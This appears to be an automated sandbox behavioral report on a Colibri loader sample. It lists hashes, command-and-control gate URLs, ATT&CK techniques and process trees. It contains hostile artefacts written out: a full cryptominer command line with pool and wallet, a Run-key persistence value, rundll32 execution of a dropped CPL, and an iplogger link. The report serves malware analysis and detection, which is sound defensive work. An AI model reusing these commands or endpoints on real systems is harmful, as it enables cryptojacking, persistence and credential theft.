Behavioral Report

Analysis

max time kernel
145s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20220812-en
resource tags

arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
submitted
03-09-2022 13:00

Sharing

Copy URL

Twitter E-mail

Report Files Registry Network Processes Mutex Misc

General

Target

913240d24664aeeee23dcf389d6f2ce9.exe
Size

602KB
MD5

913240d24664aeeee23dcf389d6f2ce9
SHA1

730b13fb29347ee478d79195e49977de41ed740f
SHA256

9e5ee80ee0e72b51abc4491e80fb8cf07a9d9c22b083d08f1db24ffae89517dc
SHA512

8a7e73fc3214dccdbea8a5f6a70b40f233719b2a7ce8bd205d3be2f01c93412d788fea071020dbbd76d79c43352fb71f60dab0e8eec18b159d5d0f970ad7bde7
SSDEEP

6144:up/J6DzcxdUf4/p6gj59aG5Ye5fYNYPk30QRyzpGa+IZ:up/J6DzudUw/t9Ge5fYlEQRyzwrG

Score

10^/10

colibri build1 discovery loader miner persistence spyware stealer

Malware Config

Extracted

Family

colibri

Version

1.2.0

Botnet

Build1

http://zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc/gate.php

http://yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx/gate.php

Signatures

Colibri Loader
A loader sold as MaaS first seen in August 2021.
loader colibri
Detectes Phoenix Miner Payload 2 IoCs
miner

Processes:

resource yara_rule

behavioral2/files/0x0006000000022e11-162.dat miner_phoenix
behavioral2/files/0x0006000000022e11-163.dat miner_phoenix
Downloads MZ/PE file

resource	yara_rule
behavioral2/files/0x0006000000022e11-162.dat	miner_phoenix
behavioral2/files/0x0006000000022e11-163.dat	miner_phoenix

Executes dropped EXE 14 IoCs

Processes:

conhost.execonhost.exemsedge.exesvchost.exeE68BDCEGIC48HB2.exetmp2CFB.tmp.exetmp2CFB.tmp.exeF95GL6CI334E94K.exetmp9913.tmp.exetmp9913.tmp.exetmp9913.tmp.exeI4A129AFHKMCE25.exeG1MBAE8K121863A.exe9F4J7AD4B0C20GF.exe

pid	process
2748	conhost.exe
4928	conhost.exe
1792	msedge.exe
2140	svchost.exe
3888	E68BDCEGIC48HB2.exe
3796	tmp2CFB.tmp.exe
764	tmp2CFB.tmp.exe
5108	F95GL6CI334E94K.exe
4848	tmp9913.tmp.exe
4244	tmp9913.tmp.exe
1268	tmp9913.tmp.exe
3612	I4A129AFHKMCE25.exe
3428	G1MBAE8K121863A.exe
2100	9F4J7AD4B0C20GF.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

TTPs:

Query Registry System Information Discovery

Processes:

E68BDCEGIC48HB2.exeF95GL6CI334E94K.exeG1MBAE8K121863A.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	E68BDCEGIC48HB2.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	F95GL6CI334E94K.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	G1MBAE8K121863A.exe

Loads dropped DLL 3 IoCs

Processes:

rundll32.exerundll32.exe

pid process

3516 rundll32.exe
1972 rundll32.exe
1972 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

TTPs:

Data from Local System Credentials in Files
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

TTPs:

Data from Local System Credentials in Files

pid	process
3516	rundll32.exe
1972	rundll32.exe
1972	rundll32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

TTPs:

Registry Run Keys / Startup Folder Modify Registry

Processes:

913240d24664aeeee23dcf389d6f2ce9.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run	913240d24664aeeee23dcf389d6f2ce9.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MSEdge = "C:\\Users\\Admin\\AppData\\Roaming\\MSEdge\\msedge.exe"	913240d24664aeeee23dcf389d6f2ce9.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

TTPs:

Query Registry
Legitimate hosting services abused for malware hosting/C2 1 TTPs

TTPs:

Web Service
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

svchost.exe

pid process

2140 svchost.exe
2140 svchost.exe

pid	process
2140	svchost.exe
2140	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

conhost.exe913240d24664aeeee23dcf389d6f2ce9.exe913240d24664aeeee23dcf389d6f2ce9.exetmp2CFB.tmp.exetmp9913.tmp.exe

description	pid	process	target process
PID 2748 set thread context of 4928	2748	conhost.exe	conhost.exe
PID 4160 set thread context of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 set thread context of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 3796 set thread context of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 4244 set thread context of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs:

System Information Discovery
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

380 3612 WerFault.exe I4A129AFHKMCE25.exe

pid	pid_target	process	target process
380	3612	WerFault.exe	I4A129AFHKMCE25.exe

Modifies Internet Explorer settings 1 TTPs 4 IoCs

adware spyware

TTPs:

Modify Registry

Processes:

9F4J7AD4B0C20GF.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	9F4J7AD4B0C20GF.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	9F4J7AD4B0C20GF.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync	9F4J7AD4B0C20GF.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	9F4J7AD4B0C20GF.exe

Modifies registry class 1 IoCs

Processes:

G1MBAE8K121863A.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings G1MBAE8K121863A.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings	G1MBAE8K121863A.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

E68BDCEGIC48HB2.exeF95GL6CI334E94K.exe

pid	process
3888	E68BDCEGIC48HB2.exe
3888	E68BDCEGIC48HB2.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe
5108	F95GL6CI334E94K.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

E68BDCEGIC48HB2.exeF95GL6CI334E94K.exe

description pid process

Token: SeDebugPrivilege 3888 E68BDCEGIC48HB2.exe
Token: SeDebugPrivilege 5108 F95GL6CI334E94K.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

9F4J7AD4B0C20GF.exe

pid process

2100 9F4J7AD4B0C20GF.exe
2100 9F4J7AD4B0C20GF.exe

description	pid	process
Token: SeDebugPrivilege	3888	E68BDCEGIC48HB2.exe
Token: SeDebugPrivilege	5108	F95GL6CI334E94K.exe

pid	process
2100	9F4J7AD4B0C20GF.exe
2100	9F4J7AD4B0C20GF.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

913240d24664aeeee23dcf389d6f2ce9.execonhost.exe913240d24664aeeee23dcf389d6f2ce9.exe913240d24664aeeee23dcf389d6f2ce9.execmd.exemsedge.exeE68BDCEGIC48HB2.exetmp2CFB.tmp.exeF95GL6CI334E94K.exetmp9913.tmp.exetmp9913.tmp.exe

description	pid	process	target process
PID 4160 wrote to memory of 2748	4160	913240d24664aeeee23dcf389d6f2ce9.exe	conhost.exe
PID 4160 wrote to memory of 2748	4160	913240d24664aeeee23dcf389d6f2ce9.exe	conhost.exe
PID 4160 wrote to memory of 2748	4160	913240d24664aeeee23dcf389d6f2ce9.exe	conhost.exe
PID 2748 wrote to memory of 4928	2748	conhost.exe	conhost.exe
PID 2748 wrote to memory of 4928	2748	conhost.exe	conhost.exe
PID 2748 wrote to memory of 4928	2748	conhost.exe	conhost.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 2748 wrote to memory of 4928	2748	conhost.exe	conhost.exe
PID 2748 wrote to memory of 4928	2748	conhost.exe	conhost.exe
PID 2748 wrote to memory of 4928	2748	conhost.exe	conhost.exe
PID 2748 wrote to memory of 4928	2748	conhost.exe	conhost.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4160 wrote to memory of 4244	4160	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 4244 wrote to memory of 5076	4244	913240d24664aeeee23dcf389d6f2ce9.exe	913240d24664aeeee23dcf389d6f2ce9.exe
PID 5076 wrote to memory of 3360	5076	913240d24664aeeee23dcf389d6f2ce9.exe	cmd.exe
PID 5076 wrote to memory of 3360	5076	913240d24664aeeee23dcf389d6f2ce9.exe	cmd.exe
PID 5076 wrote to memory of 3360	5076	913240d24664aeeee23dcf389d6f2ce9.exe	cmd.exe
PID 3360 wrote to memory of 1792	3360	cmd.exe	msedge.exe
PID 3360 wrote to memory of 1792	3360	cmd.exe	msedge.exe
PID 1792 wrote to memory of 2140	1792	msedge.exe	svchost.exe
PID 1792 wrote to memory of 2140	1792	msedge.exe	svchost.exe
PID 5076 wrote to memory of 3888	5076	913240d24664aeeee23dcf389d6f2ce9.exe	E68BDCEGIC48HB2.exe
PID 5076 wrote to memory of 3888	5076	913240d24664aeeee23dcf389d6f2ce9.exe	E68BDCEGIC48HB2.exe
PID 3888 wrote to memory of 3796	3888	E68BDCEGIC48HB2.exe	tmp2CFB.tmp.exe
PID 3888 wrote to memory of 3796	3888	E68BDCEGIC48HB2.exe	tmp2CFB.tmp.exe
PID 3888 wrote to memory of 3796	3888	E68BDCEGIC48HB2.exe	tmp2CFB.tmp.exe
PID 3796 wrote to memory of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 3796 wrote to memory of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 3796 wrote to memory of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 3796 wrote to memory of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 3796 wrote to memory of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 3796 wrote to memory of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 3796 wrote to memory of 764	3796	tmp2CFB.tmp.exe	tmp2CFB.tmp.exe
PID 5076 wrote to memory of 5108	5076	913240d24664aeeee23dcf389d6f2ce9.exe	F95GL6CI334E94K.exe
PID 5076 wrote to memory of 5108	5076	913240d24664aeeee23dcf389d6f2ce9.exe	F95GL6CI334E94K.exe
PID 5108 wrote to memory of 4848	5108	F95GL6CI334E94K.exe	tmp9913.tmp.exe
PID 5108 wrote to memory of 4848	5108	F95GL6CI334E94K.exe	tmp9913.tmp.exe
PID 5108 wrote to memory of 4848	5108	F95GL6CI334E94K.exe	tmp9913.tmp.exe
PID 4848 wrote to memory of 4244	4848	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4848 wrote to memory of 4244	4848	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4848 wrote to memory of 4244	4848	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4244 wrote to memory of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4244 wrote to memory of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4244 wrote to memory of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4244 wrote to memory of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4244 wrote to memory of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4244 wrote to memory of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 4244 wrote to memory of 1268	4244	tmp9913.tmp.exe	tmp9913.tmp.exe
PID 5076 wrote to memory of 3612	5076	913240d24664aeeee23dcf389d6f2ce9.exe	I4A129AFHKMCE25.exe

C:\Users\Admin\AppData\Local\Temp\913240d24664aeeee23dcf389d6f2ce9.exe

"C:\Users\Admin\AppData\Local\Temp\913240d24664aeeee23dcf389d6f2ce9.exe"

Suspicious use of SetThreadContext
Suspicious use of WriteProcessMemory

PID:4160

C:\ProgramData\conhost.exe

"C:\ProgramData\conhost.exe"

Executes dropped EXE
Suspicious use of SetThreadContext
Suspicious use of WriteProcessMemory

PID:2748

C:\ProgramData\conhost.exe

"C:\ProgramData\conhost.exe"

Executes dropped EXE

PID:4928

C:\Users\Admin\AppData\Local\Temp\913240d24664aeeee23dcf389d6f2ce9.exe

"C:\Users\Admin\AppData\Local\Temp\913240d24664aeeee23dcf389d6f2ce9.exe"

Suspicious use of SetThreadContext
Suspicious use of WriteProcessMemory

PID:4244

C:\Users\Admin\AppData\Local\Temp\913240d24664aeeee23dcf389d6f2ce9.exe

"C:\Users\Admin\AppData\Local\Temp\913240d24664aeeee23dcf389d6f2ce9.exe"

Adds Run key to start application
Suspicious use of WriteProcessMemory

PID:5076

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe

Suspicious use of WriteProcessMemory

PID:3360

C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe

C:\Users\Admin\AppData\Roaming\MSEdge\msedge.exe

Executes dropped EXE
Suspicious use of WriteProcessMemory

PID:1792

C:\Users\Admin\AppData\Roaming\MSEdge\svchost.exe

-pool us-eth.2miners.com:2020 -wal 0x298a98736156cdffdfaf4580afc4966904f1e12e -worker ferma -epsw x -mode 1 -log 0 -mport 0 -etha 0 -ftime 55 -retrydelay 1 -coin eth

Executes dropped EXE
Suspicious use of NtSetInformationThreadHideFromDebugger

PID:2140

C:\Users\Admin\AppData\Local\Temp\E68BDCEGIC48HB2.exe

"C:\Users\Admin\AppData\Local\Temp\E68BDCEGIC48HB2.exe"

Executes dropped EXE
Checks computer location settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory

PID:3888

C:\Users\Admin\AppData\Local\Temp\tmp2CFB.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2CFB.tmp.exe"

Executes dropped EXE
Suspicious use of SetThreadContext
Suspicious use of WriteProcessMemory

PID:3796

C:\Users\Admin\AppData\Local\Temp\tmp2CFB.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp2CFB.tmp.exe"

Executes dropped EXE

PID:764

C:\Users\Admin\AppData\Local\Temp\F95GL6CI334E94K.exe

"C:\Users\Admin\AppData\Local\Temp\F95GL6CI334E94K.exe"

Executes dropped EXE
Checks computer location settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory

PID:5108

C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe"

Executes dropped EXE
Suspicious use of WriteProcessMemory

PID:4848

C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe"

Executes dropped EXE
Suspicious use of SetThreadContext
Suspicious use of WriteProcessMemory

PID:4244

C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp9913.tmp.exe"

Executes dropped EXE

PID:1268

C:\Users\Admin\AppData\Local\Temp\I4A129AFHKMCE25.exe

"C:\Users\Admin\AppData\Local\Temp\I4A129AFHKMCE25.exe"

Executes dropped EXE

PID:3612

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3612 -s 700

Program crash

PID:380

C:\Users\Admin\AppData\Local\Temp\G1MBAE8K121863A.exe

"C:\Users\Admin\AppData\Local\Temp\G1MBAE8K121863A.exe"

Executes dropped EXE
Checks computer location settings
Modifies registry class

PID:3428

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",

PID:3880

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",

Loads dropped DLL

PID:3516

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",

PID:2608

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL",

Loads dropped DLL

PID:1972

C:\Users\Admin\AppData\Local\Temp\9F4J7AD4B0C20GF.exe

https://iplogger.org/1QsEf7

Executes dropped EXE
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx

PID:2100

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 408 -p 3612 -ip 3612

PID:2888

Network

MITRE ATT&CK Matrix

Collection

Data from Local System

T1005

Command and Control

Credential Access

Credentials in Files

T1081

Defense Evasion

Web Service

T1102

Modify Registry

T1112

Discovery

Query Registry

T1012

System Information Discovery

T1082

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Replay Monitor

00:00 00:00

Downloads

C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\ProgramData\conhost.exe
Filesize
75KB

MD5
e0a68b98992c1699876f818a22b5b907

SHA1
d41e8ad8ba51217eb0340f8f69629ccb474484d0

SHA256
2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f

SHA512
856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

Download Submit
C:\Users\Admin\AppData\Local\Temp\9F4J7AD4B0C20GF.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\9F4J7AD4B0C20GF.exe
Filesize
8KB

MD5
8719ce641e7c777ac1b0eaec7b5fa7c7

SHA1
c04de52cb511480cc7d00d67f1d9e17b02d6406b

SHA256
6283ac6ecbf4c4038cf44896dd221c7c11152bac77273709330409032c3e72ea

SHA512
7be5bd6d2342dd02818f1979e7e74a6376658711ac82a59b2af1a67207cfd3c7416b657af01216473b15132e4aa5c6675f0eb8ee6343192c7dfc4a5249ccaa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\E68BDCEGIC48HB2.exe
Filesize
487KB

MD5
8dff0d3f99d12d37b665c9d8a8316a19

SHA1
f0bdaf7f749656907bb0861c715c1a818d78fd41

SHA256
34cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1

SHA512
6ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464

Download Submit
C:\Users\Admin\AppData\Local\Temp\E68BDCEGIC48HB2.exe
Filesize
487KB

MD5
8dff0d3f99d12d37b665c9d8a8316a19

SHA1
f0bdaf7f749656907bb0861c715c1a818d78fd41

SHA256
34cdcd0ccda9ba7a51d1f6aaaa8a2a6d6c64f2fb58627a5f0b94d922be6adce1

SHA512
6ce36c92b7d6d52dd77383a9847f1bbf17af11a8a92da90efc8b6f6c1ab2b0985eea5983a553556d5a63e4b86d9b2711b870729557782bd0456e6fe10eb16464

Download Submit
C:\Users\Admin\AppData\Local\Temp\F95GL6CI334E94K.exe
Filesize
456KB

MD5
ee30741a76c6c35fd4766b2fa48d63be

SHA1
db89a94dcd59a7fcae3ff068efc3fa00e8f3abbe

SHA256
5d5371581a8a41ad50e0d34e269ebbd17190c0e6b84526374c5455846387107c

SHA512
a3d2a5fae1108e5f070638d482f2e67f964b55a72373f0b87542edc0615d140205cc49439f543168e012a3574ae9ec3af2073909aaf90b653e7ff38cb16af975

Download Submit
C:\Users\Admin\AppData\Local\Temp\F95GL6CI334E94K.exe
Filesize
456KB

MD5
ee30741a76c6c35fd4766b2fa48d63be

SHA1
db89a94dcd59a7fcae3ff068efc3fa00e8f3abbe

SHA256
5d5371581a8a41ad50e0d34e269ebbd17190c0e6b84526374c5455846387107c

SHA512
a3d2a5fae1108e5f070638d482f2e67f964b55a72373f0b87542edc0615d140205cc49439f543168e012a3574ae9ec3af2073909aaf90b653e7ff38cb16af975

Download Submit
C:\Users\Admin\AppData\Local\Temp\G1MBAE8K121863A.exe
Filesize
1MB

MD5
2d52952e6bf0bf4c78e0db6ad350cb3c

SHA1
75cb964419f53cca56a6f0829f7a2bd04c6bd8c8

SHA256
26afcf231653a0c74f711b79ddaf53f54dae8a8cfd38858e179f5b8642a4da60

SHA512
4ef6dfbe6876dd591e7c2d2ba5defc36d08d5f61f69bd76dd8f1e70b8b8a1a86bf9354fea6dc777eda25b9e1b757d10454348e6918b1e43558f501a690e6dd1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\G1MBAE8K121863A.exe
Filesize
1MB

MD5
2d52952e6bf0bf4c78e0db6ad350cb3c

SHA1
75cb964419f53cca56a6f0829f7a2bd04c6bd8c8

SHA256
26afcf231653a0c74f711b79ddaf53f54dae8a8cfd38858e179f5b8642a4da60

SHA512
4ef6dfbe6876dd591e7c2d2ba5defc36d08d5f61f69bd76dd8f1e70b8b8a1a86bf9354fea6dc777eda25b9e1b757d10454348e6918b1e43558f501a690e6dd1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\I4A129AFHKMCE25.exe
Filesize
305KB

MD5
0d52a038018f8bf8cd91dacc4d3307d6

SHA1
37f37b3e998706ab530c1c9a80cbbfac823d605c

SHA256
d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799

SHA512
51ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b

Download Submit
C:\Users\Admin\AppData\Local\Temp\I4A129AFHKMCE25.exe
Filesize
305KB

MD5
0d52a038018f8bf8cd91dacc4d3307d6

SHA1
37f37b3e998706ab530c1c9a80cbbfac823d605c

SHA256
d664762bc07e033a42f11964f7a086389bd6a8460a6a88f1dc30745b195d2799

SHA512
51ca7f2bcbf5b3a3b57ba102342d0f7c23b9cad09a5f00562cca5e285cf83736efc51344c04d5a8580a10e646a23df56222ccdb9d5dc37dfd26608ccc517260b

Download Submit
C:\Users\Admin\AppData\Local\Temp\SBJBM.CPL
Filesize
1MB

MD5
0d252e0b9151f27dde3c1aafd5bfe86e

SHA1
b2987e440920b248907d6d98f17c091250d864ad

SHA256
2cee59d85b162709249a6a0f8a9da2bcc5ed0cab570dc82be42f9f3b24a4d70d

SHA512
438a87655ea510badf85a1970b9bd18e3fed074dc9de67278ff0652456ade29af7afa773c32551c24cf9aa04d804d716c414fd01d24905f8b5248a5e2d42d36c

Download Submit
C:\Users\Admin\AppData\Local\Temp\sBJBM.cpl
Filesize
1MB

MD5
